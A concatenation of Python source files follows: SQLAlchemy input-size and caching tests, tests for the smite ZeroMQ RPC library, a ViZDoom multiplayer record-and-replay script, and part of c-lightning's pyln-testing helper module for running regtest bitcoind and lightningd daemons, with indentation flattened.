canary = mock.Mock()
def do_set_input_sizes(cursor, list_of_tuples, context):
if not engine.dialect.positional:
# sort by "user_id", "user_name", or otherwise
# param name for a non-positional dialect, so that we can
# confirm the ordering. mostly a py2 thing probably can't
# occur on py3.6+ since we are passing dictionaries with
# "user_id", "user_name"
list_of_tuples = sorted(
list_of_tuples, key=lambda elem: elem[0]
)
canary.do_set_input_sizes(cursor, list_of_tuples, context)
def pre_exec(self):
self.translate_set_input_sizes = None
self.include_set_input_sizes = None
self.exclude_set_input_sizes = None
engine = testing_engine()
engine.connect().close()
# the idea of this test is we fully replace the dialect
# do_set_input_sizes with a mock, and we can then intercept
# the setting passed to the dialect. the test table uses very
# "safe" datatypes so that the DBAPI does not actually need
# setinputsizes() called in order to work.
with mock.patch.object(
engine.dialect, "use_setinputsizes", True
), mock.patch.object(
engine.dialect, "do_set_input_sizes", do_set_input_sizes
), mock.patch.object(
engine.dialect.execution_ctx_cls, "pre_exec", pre_exec
):
yield engine, canary
def test_set_input_sizes_no_event(self, input_sizes_fixture):
engine, canary = input_sizes_fixture
with engine.begin() as conn:
conn.execute(
self.tables.users.insert(),
[
{"user_id": 1, "user_name": "n1"},
{"user_id": 2, "user_name": "n2"},
],
)
eq_(
canary.mock_calls,
[
call.do_set_input_sizes(
mock.ANY,
[
(
"user_id",
mock.ANY,
testing.eq_type_affinity(Integer),
),
(
"user_name",
mock.ANY,
testing.eq_type_affinity(String),
),
],
mock.ANY,
)
],
)
def test_set_input_sizes_expanding_param(self, input_sizes_fixture):
engine, canary = input_sizes_fixture
with engine.connect() as conn:
conn.execute(
select(self.tables.users).where(
self.tables.users.c.user_name.in_(["x", "y", "z"])
)
)
eq_(
canary.mock_calls,
[
call.do_set_input_sizes(
mock.ANY,
[
(
"user_name_1_1",
mock.ANY,
testing.eq_type_affinity(String),
),
(
"user_name_1_2",
mock.ANY,
testing.eq_type_affinity(String),
),
(
"user_name_1_3",
mock.ANY,
testing.eq_type_affinity(String),
),
],
mock.ANY,
)
],
)
@testing.requires.tuple_in
def test_set_input_sizes_expanding_tuple_param(self, input_sizes_fixture):
engine, canary = input_sizes_fixture
from sqlalchemy import tuple_
with engine.connect() as conn:
conn.execute(
select(self.tables.users).where(
tuple_(
self.tables.users.c.user_id,
self.tables.users.c.user_name,
).in_([(1, "x"), (2, "y")])
)
)
eq_(
canary.mock_calls,
[
call.do_set_input_sizes(
mock.ANY,
[
(
"param_1_1_1",
mock.ANY,
testing.eq_type_affinity(Integer),
),
(
"param_1_1_2",
mock.ANY,
testing.eq_type_affinity(String),
),
(
"param_1_2_1",
mock.ANY,
testing.eq_type_affinity(Integer),
),
(
"param_1_2_2",
mock.ANY,
testing.eq_type_affinity(String),
),
],
mock.ANY,
)
],
)
def test_set_input_sizes_event(self, input_sizes_fixture):
engine, canary = input_sizes_fixture
SPECIAL_STRING = mock.Mock()
@event.listens_for(engine, "do_setinputsizes")
def do_setinputsizes(
inputsizes, cursor, statement, parameters, context
):
for k in inputsizes:
if k.type._type_affinity is String:
inputsizes[k] = (
SPECIAL_STRING,
None,
0,
)
with engine.begin() as conn:
conn.execute(
self.tables.users.insert(),
[
{"user_id": 1, "user_name": "n1"},
{"user_id": 2, "user_name": "n2"},
],
)
eq_(
canary.mock_calls,
[
call.do_set_input_sizes(
mock.ANY,
[
(
"user_id",
mock.ANY,
testing.eq_type_affinity(Integer),
),
(
"user_name",
(SPECIAL_STRING, None, 0),
testing.eq_type_affinity(String),
),
],
mock.ANY,
)
],
)
class DialectDoesntSupportCachingTest(fixtures.TestBase):
"""test the opt-in caching flag added in :ticket:`6184`."""
__only_on__ = "sqlite+pysqlite"
__requires__ = ("sqlite_memory",)
@testing.fixture()
def sqlite_no_cache_dialect(self, testing_engine):
from sqlalchemy.dialects.sqlite.pysqlite import SQLiteDialect_pysqlite
from sqlalchemy.dialects.sqlite.base import SQLiteCompiler
from sqlalchemy.sql import visitors
class MyCompiler(SQLiteCompiler):
def translate_select_structure(self, select_stmt, **kwargs):
select = select_stmt
if not getattr(select, "_mydialect_visit", None):
select = visitors.cloned_traverse(select_stmt, {}, {})
if select._limit_clause is not None:
# create a bindparam with a fixed name and hardcode
# it to the given limit. this breaks caching.
select._limit_clause = bindparam(
"limit", value=select._limit, literal_execute=True
)
select._mydialect_visit = True
return select
class MyDialect(SQLiteDialect_pysqlite):
statement_compiler = MyCompiler
supports_statement_cache = False
from sqlalchemy.dialects import registry
def go(name):
return MyDialect
with mock.patch.object(registry, "load", go):
eng = testing_engine()
yield eng
@testing.fixture
def data_fixture(self, sqlite_no_cache_dialect):
m = MetaData()
t = Table("t1", m, Column("x", Integer))
with sqlite_no_cache_dialect.begin() as conn:
t.create(conn)
conn.execute(t.insert(), [{"x": 1}, {"x": 2}, {"x": 3}, {"x": 4}])
return t
def test_no_cache(self, sqlite_no_cache_dialect, data_fixture):
eng = sqlite_no_cache_dialect
def go(lim):
with eng.connect() as conn:
result = conn.execute(
select(data_fixture).order_by(data_fixture.c.x).limit(lim)
)
return result
r1 = go(2)
r2 = go(3)
eq_(r1.all(), [(1,), (2,)])
eq_(r2.all(), [(1,), (2,), (3,)])
def test_it_caches(self, sqlite_no_cache_dialect, data_fixture):
eng = sqlite_no_cache_dialect
eng.dialect.__class__.supports_statement_cache = True
del eng.dialect.__dict__["_supports_statement_cache"]
def go(lim):
with eng.connect() as conn:
result = conn.execute(
select(data_fixture).order_by(data_fixture.c.x).limit(lim)
)
return result
r1 = go(2)
r2 = go(3)
eq_(r1.all(), [(1,), (2,)])
# wrong answer
eq_(
r2.all(),
[
(1,),
(2,),
],
)
|
tests.py
|
import os
import uuid
import time
import random
from threading import Thread
from string import ascii_lowercase
import zmq
from smite import (
Client,
RClient,
Servant,
Proxy,
utils,
)
from smite.exceptions import (
ClientTimeout,
MessageException,
)
HOST = '127.0.0.1'
PORT = 3000
CONNECTION_URI = 'tcp://{}:{}'.format(HOST, PORT)
def create_keys_dir():
rnd_str = ''.join([random.choice(ascii_lowercase) for _ in range(10)])
dir_ = '/tmp/smite_test_keys_{}'.format(rnd_str)
os.mkdir(dir_)
return dir_
def test_client_timeout():
timeout = 3
client = Client(default_timeout=timeout)
client.connect(CONNECTION_URI)
raised = False
start = time.time()
try:
client.send('dummy_method')
except ClientTimeout:
raised = True
assert raised
# it should take around 3 seconds
assert 2.5 < time.time() - start < 3.5
    # the servant should not receive this message after it starts; it's just gone
class DummyException(Exception):
pass
def dummy_method():
raise DummyException
servant = Servant({'dummy_method': dummy_method})
servant.bind_tcp(HOST, PORT)
    # run the servant in a separate thread and wait 3 seconds for the message
servant_thread = Thread(target=servant.run)
servant_thread.start()
time.sleep(3)
servant.stop()
servant_thread.join()
client.close()
for thread_stats in servant.stats['threads'].values():
assert thread_stats['exceptions'] == 0
assert thread_stats['received_messages'] == 0
assert thread_stats['malicious_messages'] == 0
assert thread_stats['processed_messages'] == 0
assert servant.stats['summary']['exceptions'] == 0
assert servant.stats['summary']['received_messages'] == 0
assert servant.stats['summary']['malicious_messages'] == 0
assert servant.stats['summary']['processed_messages'] == 0
def test_noreply_message():
servant = Servant({'echo': lambda t: t})
servant.bind_tcp(HOST, PORT)
servant_thread = Thread(target=servant.run)
servant_thread.start()
client = Client()
client.connect(CONNECTION_URI)
client.send('echo', args=(uuid.uuid1().hex,), noreply=True)
time.sleep(2)
assert servant.stats['summary']['received_messages'] == 1
assert servant.stats['summary']['processed_messages'] == 1
servant.stop()
servant_thread.join()
client.close()
def test_rclient():
ipc_name = 'smite-test-{}'.format(uuid.uuid1().hex)
servant = Servant({'echo': lambda t: t})
servant.bind_ipc(ipc_name)
servant.run(True)
msg_num = 10
client = RClient('ipc://{}'.format(ipc_name))
for _ in range(msg_num):
echo_txt = uuid.uuid1().hex
rep = client.send('echo', echo_txt)
assert rep == echo_txt
assert servant.stats['summary']['exceptions'] == 0
assert servant.stats['summary']['malicious_messages'] == 0
assert servant.stats['summary']['received_messages'] == msg_num
assert servant.stats['summary']['processed_messages'] == msg_num
client.close()
servant.stop()
def test_default_handler():
ipc_name = 'smite-test-{}'.format(uuid.uuid1().hex)
    def default_handler(t):
        return t
servant = Servant()
servant.set_default_handler(default_handler)
servant.bind_ipc(ipc_name)
servant.run(True)
msg_num = 10
client = RClient('ipc://{}'.format(ipc_name))
for _ in range(msg_num):
msg_txt = uuid.uuid1().hex
random_msg_name = uuid.uuid1().hex
rep = client.send(random_msg_name, msg_txt)
assert rep == msg_txt
assert servant.stats['summary']['exceptions'] == 0
assert servant.stats['summary']['malicious_messages'] == 0
assert servant.stats['summary']['received_messages'] == msg_num
assert servant.stats['summary']['processed_messages'] == msg_num
client.close()
servant.stop()
def test_rclient_noreply():
ipc_name = 'smite-test-{}'.format(uuid.uuid1().hex)
servant = Servant({'echo': lambda t: t})
servant.bind_ipc(ipc_name)
servant.run(True)
msg_num = 10
client = RClient('ipc://{}'.format(ipc_name))
for _ in range(msg_num):
echo_txt = uuid.uuid1().hex
client.send_noreply('echo', echo_txt)
time.sleep(1)
assert servant.stats['summary']['exceptions'] == 0
assert servant.stats['summary']['malicious_messages'] == 0
assert servant.stats['summary']['received_messages'] == msg_num
assert servant.stats['summary']['processed_messages'] == msg_num
client.close()
servant.stop()
def test_multiple_clients():
def short_echo(text):
time.sleep(1)
return text
def long_echo(text):
time.sleep(2)
return text
called = {
'extract_one': False,
'extract_two': False,
'process_one': False,
'process_two': False,
}
def extract_one(msg):
called['extract_one'] = True
        # 'foo:bar-real_message' -> 'bar-real_message' (full chain sketched after this test)
return msg.split(':', 1)[1]
def extract_two(msg):
called['extract_two'] = True
        # 'bar-real_message' -> 'real_message'
return msg.split('-', 1)[1]
servant = Servant(
{'short_echo': short_echo, 'long_echo': long_echo},
message_extractors=(extract_one, extract_two),
)
servant.bind_tcp(HOST, PORT)
servant.run(run_in_background=True)
def process_one(msg):
called['process_one'] = True
return 'bar-{}'.format(msg)
def process_two(msg):
called['process_two'] = True
return 'foo:{}'.format(msg)
def send_msg(msg_name):
client = Client(message_processors=(process_one, process_two))
client.connect(CONNECTION_URI)
msg_txt = uuid.uuid4().hex
res = client.send(msg_name, args=(msg_txt,))
assert res == msg_txt
client.close()
client_threads = []
# send short_echo
    thread = Thread(target=send_msg, args=('short_echo',))
client_threads.append(thread)
thread.start()
# send long_echo
    thread = Thread(target=send_msg, args=('long_echo',))
client_threads.append(thread)
thread.start()
# long echo takes 2 seconds
time.sleep(2.5)
assert servant.stats['summary']['received_messages'] == 2
assert servant.stats['summary']['processed_messages'] == 2
assert servant.stats['summary']['exceptions'] == 0
for was_called in called.values():
assert was_called
servant.stop()
for client_thread in client_threads:
client_thread.join()
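def _processor_chain_sketch(payload='real_message'):
    """Hedged, self-contained sketch of the transform chain exercised by
    test_multiple_clients above. The inline expressions mirror that test's
    local process_*/extract_* helpers; they are illustrative and not part of
    the smite API.
    """
    wrapped = 'foo:{}'.format('bar-{}'.format(payload))    # client: process_one, then process_two
    unwrapped = wrapped.split(':', 1)[1].split('-', 1)[1]  # servant: extract_one, then extract_two
    assert unwrapped == payload
    return wrapped, unwrapped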
def test_inappropriate_message_name():
raised = False
client = Client()
client.connect_ipc('foo')
try:
client.send(msg_name='__foo__')
except ValueError:
raised = True
assert raised
def test_client_not_connected():
raised = False
client = Client()
try:
client.send(msg_name='foo')
except RuntimeError:
raised = True
assert raised
def test_proxy():
host = '127.0.0.1'
proxy_port = '9000'
servant_port = '9001'
def echo(text):
return text
servant = Servant({'echo': echo})
servant.bind_tcp(host, servant_port)
servant_thread = Thread(target=servant.run)
servant_thread.start()
proxy = Proxy(host, servant_port)
proxy.bind(host, proxy_port)
proxy_thread = Thread(target=proxy.run)
proxy_thread.start()
class send_msg(object):
def __init__(self, message_name):
self.message_name = message_name
def __call__(self):
time.sleep(.3)
client = Client()
client.connect_tcp(host, proxy_port)
txt = uuid.uuid4().hex
res = client.send(self.message_name, args=(txt,))
assert res == txt
client.close()
messages_num = 10
client_threads = []
    for i in range(messages_num):
thread = Thread(target=send_msg('echo'))
client_threads.append(thread)
thread.start()
time.sleep(1)
assert servant.stats['summary']['received_messages'] == messages_num
assert servant.stats['summary']['processed_messages'] == messages_num
assert servant.stats['summary']['exceptions'] == 0
servant.stop()
servant_thread.join()
proxy.stop()
proxy_thread.join()
def test_exception_response():
exc_message = 'This is dummy exception message'
class DummyException(Exception):
pass
def raise_dummy_exc():
raise DummyException(exc_message)
servant = Servant({'raise_dummy_exc': raise_dummy_exc})
servant.bind_tcp(HOST, PORT)
servant.run(True)
client = Client()
client.connect(CONNECTION_URI)
raised = False
try:
client.send('raise_dummy_exc')
    except MessageException as e:
assert e.message == exc_message
raised = True
assert raised
time.sleep(.1)
assert servant.stats['summary']['received_messages'] == 1
assert servant.stats['summary']['exceptions'] == 1
servant.stop()
client.close()
def test_malicious_messages():
def echo(text):
return text
servant = Servant([echo])
servant.bind_tcp(HOST, PORT)
servant_thread = Thread(target=servant.run)
servant_thread.start()
ctx = zmq.Context()
socket = ctx.socket(zmq.DEALER)
poll = zmq.Poller()
poll.register(socket, zmq.POLLIN)
socket.connect('tcp://{}:{}'.format(HOST, PORT))
    socket.send(b'foo')
sockets = dict(poll.poll(2000))
assert sockets.get(socket) != zmq.POLLIN
time.sleep(.2)
assert servant.stats['summary']['received_messages'] == 1
assert servant.stats['summary']['processed_messages'] == 0
assert servant.stats['summary']['malicious_messages'] == 1
servant.stop()
servant_thread.join()
def test_secure_messaging():
keys_dir = create_keys_dir()
def short_echo(text):
time.sleep(1)
return text
def long_echo(text):
time.sleep(2)
return text
send_msgs = ['short_echo', 'long_echo']
# generate keys for clients
client_secrets = [
utils.create_certificates(keys_dir, 'client-{}'.format(i))[1]
for i in range(2)
]
# generate keys for servant
servant_public, servant_secret = (
utils.create_certificates(keys_dir, 'servant')
)
servant = Servant({'short_echo': short_echo, 'long_echo': long_echo})
servant.enable_security(
os.path.join(keys_dir, 'public_keys'), servant_secret,
)
servant.bind_tcp(HOST, PORT)
servant_thread = Thread(target=servant.run)
servant_thread.start()
class send_msg(object):
def __init__(self, message_name, client_secret):
self.message_name = message_name
self.client_secret = client_secret
def __call__(self):
client = Client()
client.enable_security(self.client_secret, servant_public)
client.connect(CONNECTION_URI)
txt = uuid.uuid4().hex
res = client.send(self.message_name, args=(txt,))
assert res == txt
client.close()
client_threads = []
for client_secret, method_name in zip(client_secrets, send_msgs):
thread = Thread(target=send_msg(method_name, client_secret))
client_threads.append(thread)
thread.start()
# long echo takes 2 seconds
time.sleep(2.5)
assert servant.stats['summary']['received_messages'] == 2
assert servant.stats['summary']['processed_messages'] == 2
assert servant.stats['summary']['exceptions'] == 0
servant.stop()
servant_thread.join()
for client_thread in client_threads:
client_thread.join()
|
record_multiplayer.py
|
#!/usr/bin/python
from __future__ import print_function
from vizdoom import *
from random import choice
import os
from multiprocessing import Process
def player1():
game = DoomGame()
game.load_config('../config/multi_duel.cfg')
game.add_game_args("-host 2 -deathmatch +timelimit 0.15 +sv_spawnfarthest 1 ")
game.add_game_args("+name Player1 +colorset 0")
    # Unfortunately, a multiplayer game cannot be recorded with the new_episode() method; use this game argument instead.
game.add_game_args("-record multi_rec.lmp")
game.init()
actions = [[True,False,False],[False,True,False],[False,False,True]]
while not game.is_episode_finished():
if game.is_player_dead():
game.respawn_player()
game.make_action(choice(actions))
print("Game finished!")
print("Player1 frags:", game.get_game_variable(GameVariable.FRAGCOUNT))
game.close()
def player2():
game = DoomGame()
game.load_config('../config/multi_duel.cfg')
game.set_window_visible(False)
game.add_game_args("-join 127.0.0.1")
game.add_game_args("+name Player2 +colorset 3")
game.init()
actions = [[True,False,False],[False,True,False],[False,False,True]]
while not game.is_episode_finished():
if game.is_player_dead():
game.respawn_player()
game.make_action(choice(actions))
print("Player2 frags:", game.get_game_variable(GameVariable.FRAGCOUNT))
game.close()
def replay_as_player2():
game = DoomGame()
game.load_config('../config/multi_duel.cfg')
    # At the moment ViZDoom will crash if there is no starting point - this is a workaround for the multiplayer map.
game.add_game_args("-host 1 -deathmatch")
game.init()
    # Replays the episode recorded by player 1 from the perspective of player 2.
game.replay_episode("multi_rec.lmp", 2)
while not game.is_episode_finished():
game.advance_action()
print("Game finished!")
print("Player1 frags:", game.get_game_variable(GameVariable.PLAYER1_FRAGCOUNT))
print("Player2 frags:", game.get_game_variable(GameVariable.PLAYER2_FRAGCOUNT))
game.close()
# Delete multi_rec.lmp
os.remove("multi_rec.lmp")
if __name__ == '__main__':
print("\nRECORDING")
print("************************\n")
p1 = Process(target = player1)
p1.start()
player2()
print("\nREPLAY")
print("************************\n")
replay_as_player2()
|
utils.py
|
from bitcoin.rpc import RawProxy as BitcoinProxy
from pyln.testing.btcproxy import BitcoinRpcProxy
from collections import OrderedDict
from decimal import Decimal
from ephemeral_port_reserve import reserve
from pyln.client import LightningRpc
import json
import logging
import lzma
import math
import os
import random
import re
import shutil
import sqlite3
import string
import struct
import subprocess
import sys
import threading
import time
BITCOIND_CONFIG = {
"regtest": 1,
"rpcuser": "rpcuser",
"rpcpassword": "rpcpass",
}
LIGHTNINGD_CONFIG = OrderedDict({
"log-level": "debug",
"cltv-delta": 6,
"cltv-final": 5,
"watchtime-blocks": 5,
"rescan": 1,
'disable-dns': None,
})
def env(name, default=None):
"""Access to environment variables
Allows access to environment variables, falling back to config.vars (part
of c-lightning's `./configure` output), and finally falling back to a
default value.
"""
fname = 'config.vars'
if os.path.exists(fname):
lines = open(fname, 'r').readlines()
config = dict([(line.rstrip().split('=', 1)) for line in lines])
else:
config = {}
if name in os.environ:
return os.environ[name]
elif name in config:
return config[name]
else:
return default
VALGRIND = env("VALGRIND") == "1"
TEST_NETWORK = env("TEST_NETWORK", 'regtest')
DEVELOPER = env("DEVELOPER", "0") == "1"
TEST_DEBUG = env("TEST_DEBUG", "0") == "1"
SLOW_MACHINE = env("SLOW_MACHINE", "0") == "1"
TIMEOUT = int(env("TIMEOUT", 180 if SLOW_MACHINE else 60))
if TEST_DEBUG:
logging.basicConfig(level=logging.DEBUG, stream=sys.stdout)
def wait_for(success, timeout=TIMEOUT):
start_time = time.time()
interval = 0.25
while not success() and time.time() < start_time + timeout:
time.sleep(interval)
interval *= 2
if interval > 5:
interval = 5
if time.time() > start_time + timeout:
        raise ValueError("Error waiting for {}".format(success))
def write_config(filename, opts, regtest_opts=None, section_name='regtest'):
with open(filename, 'w') as f:
for k, v in opts.items():
f.write("{}={}\n".format(k, v))
if regtest_opts:
f.write("[{}]\n".format(section_name))
for k, v in regtest_opts.items():
f.write("{}={}\n".format(k, v))
def only_one(arr):
"""Many JSON RPC calls return an array; often we only expect a single entry
"""
assert len(arr) == 1
return arr[0]
def sync_blockheight(bitcoind, nodes):
height = bitcoind.rpc.getblockchaininfo()['blocks']
for n in nodes:
wait_for(lambda: n.rpc.getinfo()['blockheight'] == height)
def wait_channel_quiescent(n1, n2):
wait_for(lambda: only_one(only_one(n1.rpc.listpeers(n2.info['id'])['peers'])['channels'])['htlcs'] == [])
wait_for(lambda: only_one(only_one(n2.rpc.listpeers(n1.info['id'])['peers'])['channels'])['htlcs'] == [])
def get_tx_p2wsh_outnum(bitcoind, tx, amount):
"""Get output number of this tx which is p2wsh of amount"""
decoded = bitcoind.rpc.decoderawtransaction(tx, True)
for out in decoded['vout']:
if out['scriptPubKey']['type'] == 'witness_v0_scripthash':
if out['value'] == Decimal(amount) / 10**8:
return out['n']
return None
class TailableProc(object):
"""A monitorable process that we can start, stop and tail.
This is the base class for the daemons. It allows us to directly
tail the processes and react to their output.
"""
def __init__(self, outputDir=None, verbose=True):
self.logs = []
self.logs_cond = threading.Condition(threading.RLock())
self.env = os.environ.copy()
self.running = False
self.proc = None
self.outputDir = outputDir
self.logsearch_start = 0
# Should we be logging lines we read from stdout?
self.verbose = verbose
# A filter function that'll tell us whether to filter out the line (not
# pass it to the log matcher and not print it to stdout).
self.log_filter = lambda line: False
def start(self, stdin=None, stdout=None, stderr=None):
"""Start the underlying process and start monitoring it.
"""
logging.debug("Starting '%s'", " ".join(self.cmd_line))
self.proc = subprocess.Popen(self.cmd_line,
stdin=stdin,
stdout=stdout if stdout else subprocess.PIPE,
stderr=stderr,
env=self.env)
self.thread = threading.Thread(target=self.tail)
self.thread.daemon = True
self.thread.start()
self.running = True
def save_log(self):
if self.outputDir:
logpath = os.path.join(self.outputDir, 'log')
with open(logpath, 'w') as f:
for l in self.logs:
f.write(l + '\n')
def stop(self, timeout=10):
self.save_log()
self.proc.terminate()
# Now give it some time to react to the signal
rc = self.proc.wait(timeout)
if rc is None:
self.proc.kill()
self.proc.wait()
self.thread.join()
return self.proc.returncode
def kill(self):
"""Kill process without giving it warning."""
self.proc.kill()
self.proc.wait()
self.thread.join()
def tail(self):
"""Tail the stdout of the process and remember it.
Stores the lines of output produced by the process in
self.logs and signals that a new line was read so that it can
be picked up by consumers.
"""
for line in iter(self.proc.stdout.readline, ''):
if len(line) == 0:
break
if self.log_filter(line.decode('ASCII')):
continue
if self.verbose:
logging.debug("%s: %s", self.prefix, line.decode().rstrip())
with self.logs_cond:
self.logs.append(str(line.rstrip()))
                self.logs_cond.notify_all()
self.running = False
self.proc.stdout.close()
if self.proc.stderr:
self.proc.stderr.close()
def is_in_log(self, regex, start=0):
"""Look for `regex` in the logs."""
ex = re.compile(regex)
for l in self.logs[start:]:
if ex.search(l):
logging.debug("Found '%s' in logs", regex)
return l
logging.debug("Did not find '%s' in logs", regex)
return None
def wait_for_logs(self, regexs, timeout=TIMEOUT):
"""Look for `regexs` in the logs.
We tail the stdout of the process and look for each regex in `regexs`,
starting from last of the previous waited-for log entries (if any). We
fail if the timeout is exceeded or if the underlying process
exits before all the `regexs` were found.
If timeout is None, no time-out is applied.
"""
logging.debug("Waiting for {} in the logs".format(regexs))
exs = [re.compile(r) for r in regexs]
start_time = time.time()
pos = self.logsearch_start
while True:
if timeout is not None and time.time() > start_time + timeout:
print("Time-out: can't find {} in logs".format(exs))
for r in exs:
if self.is_in_log(r):
print("({} was previously in logs!)".format(r))
raise TimeoutError('Unable to find "{}" in logs.'.format(exs))
elif not self.running:
raise ValueError('Process died while waiting for logs')
with self.logs_cond:
if pos >= len(self.logs):
self.logs_cond.wait(1)
continue
for r in exs.copy():
self.logsearch_start = pos + 1
if r.search(self.logs[pos]):
logging.debug("Found '%s' in logs", r)
exs.remove(r)
break
if len(exs) == 0:
return self.logs[pos]
pos += 1
def wait_for_log(self, regex, timeout=TIMEOUT):
"""Look for `regex` in the logs.
Convenience wrapper for the common case of only seeking a single entry.
"""
return self.wait_for_logs([regex], timeout)
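# Hedged usage sketch for TailableProc (not part of the original helpers): the
# command, prefix and log pattern below are illustrative assumptions showing
# how subclasses such as BitcoinD drive start()/wait_for_log()/stop().
def _example_tailable_proc():
    class EchoProc(TailableProc):
        def __init__(self):
            TailableProc.__init__(self, outputDir=None, verbose=True)
            self.prefix = 'echo-demo'
            # cmd_line is what start() hands to subprocess.Popen
            self.cmd_line = ['sh', '-c', 'echo hello-world; sleep 1']
    p = EchoProc()
    p.start()
    p.wait_for_log(r'hello-world')  # blocks until the regex shows up on stdout
    return p.stop()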
class SimpleBitcoinProxy:
"""Wrapper for BitcoinProxy to reconnect.
Long wait times between calls to the Bitcoin RPC could result in
`bitcoind` closing the connection, so here we just create
    throwaway connections. This is easier than reaching into the RPC
    library to close, reopen, and re-authenticate upon failure.
"""
def __init__(self, btc_conf_file, *args, **kwargs):
self.__btc_conf_file__ = btc_conf_file
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
# Create a callable to do the actual call
proxy = BitcoinProxy(btc_conf_file=self.__btc_conf_file__)
def f(*args):
return proxy._call(name, *args)
# Make debuggers show <function bitcoin.rpc.name> rather than <function
# bitcoin.rpc.<lambda>>
f.__name__ = name
return f
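# Hedged illustration of the throwaway-connection behaviour described above
# (the conf path is an assumption): each attribute access builds a fresh
# BitcoinProxy, so long idle gaps between calls cannot leave a stale socket.
def _example_simple_proxy(conf_file='/tmp/bitcoind-test/bitcoin.conf'):
    rpc = SimpleBitcoinProxy(btc_conf_file=conf_file)
    height = rpc.getblockcount()   # connection #1, discarded after the call
    best = rpc.getbestblockhash()  # connection #2, independent of the first
    return height, best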
class BitcoinD(TailableProc):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
TailableProc.__init__(self, bitcoin_dir, verbose=False)
if rpcport is None:
rpcport = reserve()
self.bitcoin_dir = bitcoin_dir
self.rpcport = rpcport
self.prefix = 'bitcoind'
regtestdir = os.path.join(bitcoin_dir, 'regtest')
if not os.path.exists(regtestdir):
os.makedirs(regtestdir)
self.cmd_line = [
'bitcoind',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-txindex',
'-addresstype=bech32'
]
# For up to and including 0.16.1, this needs to be in main section.
BITCOIND_CONFIG['rpcport'] = rpcport
# For after 0.16.1 (eg. 3f398d7a17f136cd4a67998406ca41a124ae2966), this
# needs its own [regtest] section.
BITCOIND_REGTEST = {'rpcport': rpcport}
self.conf_file = os.path.join(bitcoin_dir, 'bitcoin.conf')
write_config(self.conf_file, BITCOIND_CONFIG, BITCOIND_REGTEST)
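        # Hedged sketch of the bitcoin.conf written above (rpcport invented):
        #   regtest=1
        #   rpcuser=rpcuser
        #   rpcpassword=rpcpass
        #   rpcport=18443
        #   [regtest]
        #   rpcport=18443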
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.proxies = []
def start(self):
TailableProc.start(self)
self.wait_for_log("Done loading", timeout=TIMEOUT)
logging.info("BitcoinD started")
def stop(self):
for p in self.proxies:
p.stop()
self.rpc.stop()
return TailableProc.stop(self)
def get_proxy(self):
proxy = BitcoinRpcProxy(self)
self.proxies.append(proxy)
proxy.start()
return proxy
# wait_for_mempool can be used to wait for the mempool before generating blocks:
    # True := wait for at least 1 transaction
# int > 0 := wait for at least N transactions
# 'tx_id' := wait for one transaction id given as a string
    # ['tx_id1', 'tx_id2'] := wait until all of the specified transaction IDs are in the mempool
def generate_block(self, numblocks=1, wait_for_mempool=0):
if wait_for_mempool:
if isinstance(wait_for_mempool, str):
wait_for_mempool = [wait_for_mempool]
if isinstance(wait_for_mempool, list):
wait_for(lambda: all(txid in self.rpc.getrawmempool() for txid in wait_for_mempool))
else:
wait_for(lambda: len(self.rpc.getrawmempool()) >= wait_for_mempool)
# As of 0.16, generate() is removed; use generatetoaddress.
return self.rpc.generatetoaddress(numblocks, self.rpc.getnewaddress())
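    # Hedged usage sketch for the wait_for_mempool forms listed above (txids
    # are invented):
    #   bitcoind.generate_block(1, wait_for_mempool=True)            # >= 1 tx
    #   bitcoind.generate_block(1, wait_for_mempool=3)               # >= 3 txs
    #   bitcoind.generate_block(1, wait_for_mempool='deadbeef...')   # that txid
    #   bitcoind.generate_block(6, wait_for_mempool=['a1...', 'b2...'])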
def simple_reorg(self, height, shift=0):
"""
Reorganize chain by creating a fork at height=[height] and re-mine all mempool
transactions into [height + shift], where shift >= 0. Returns hashes of generated
blocks.
        Note that tx's that become invalid at [height] (because of coin maturity, locktime,
        etc.) are removed from the mempool. The length of the new chain will be original + 1
OR original + [shift], whichever is larger.
For example: to push tx's backward from height h1 to h2 < h1, use [height]=h2.
Or to change the txindex of tx's at height h1:
1. A block at height h2 < h1 should contain a non-coinbase tx that can be pulled
forward to h1.
2. Set [height]=h2 and [shift]= h1-h2
"""
hashes = []
fee_delta = 1000000
orig_len = self.rpc.getblockcount()
old_hash = self.rpc.getblockhash(height)
final_len = height + shift if height + shift > orig_len else 1 + orig_len
# TODO: raise error for insane args?
self.rpc.invalidateblock(old_hash)
self.wait_for_log(r'InvalidChainFound: invalid block=.* height={}'.format(height))
memp = self.rpc.getrawmempool()
if shift == 0:
hashes += self.generate_block(1 + final_len - height)
else:
for txid in memp:
# lower priority (to effective feerate=0) so they are not mined
self.rpc.prioritisetransaction(txid, None, -fee_delta)
hashes += self.generate_block(shift)
for txid in memp:
# restore priority so they are mined
self.rpc.prioritisetransaction(txid, None, fee_delta)
hashes += self.generate_block(1 + final_len - (height + shift))
self.wait_for_log(r'UpdateTip: new best=.* height={}'.format(final_len))
return hashes
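    # Hedged example of the shift mechanics documented in simple_reorg
    # (heights are invented):
    #   bitcoind.simple_reorg(102)           # fork at 102, re-mine its txs at 102
    #   bitcoind.simple_reorg(102, shift=2)  # fork at 102, re-mine its txs at 104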
def getnewaddress(self):
return self.rpc.getnewaddress()
class ElementsD(BitcoinD):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
config = BITCOIND_CONFIG.copy()
if 'regtest' in config:
del config['regtest']
config['chain'] = 'liquid-regtest'
BitcoinD.__init__(self, bitcoin_dir, rpcport)
self.cmd_line = [
'elementsd',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-validatepegin=0',
'-con_blocksubsidy=5000000000',
]
conf_file = os.path.join(bitcoin_dir, 'elements.conf')
config['rpcport'] = self.rpcport
BITCOIND_REGTEST = {'rpcport': self.rpcport}
write_config(conf_file, config, BITCOIND_REGTEST, section_name='liquid-regtest')
self.conf_file = conf_file
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.prefix = 'elementsd'
def getnewaddress(self):
"""Need to get an address and then make it unconfidential
"""
addr = self.rpc.getnewaddress()
info = self.rpc.getaddressinfo(addr)
return info['unconfidential']
class LightningD(TailableProc):
def __init__(self, lightning_dir, bitcoindproxy, port=9735, random_hsm=False, node_id=0):
TailableProc.__init__(self, lightning_dir)
self.executable = 'lightningd'
self.lightning_dir = lightning_dir
self.port = port
self.cmd_prefix = []
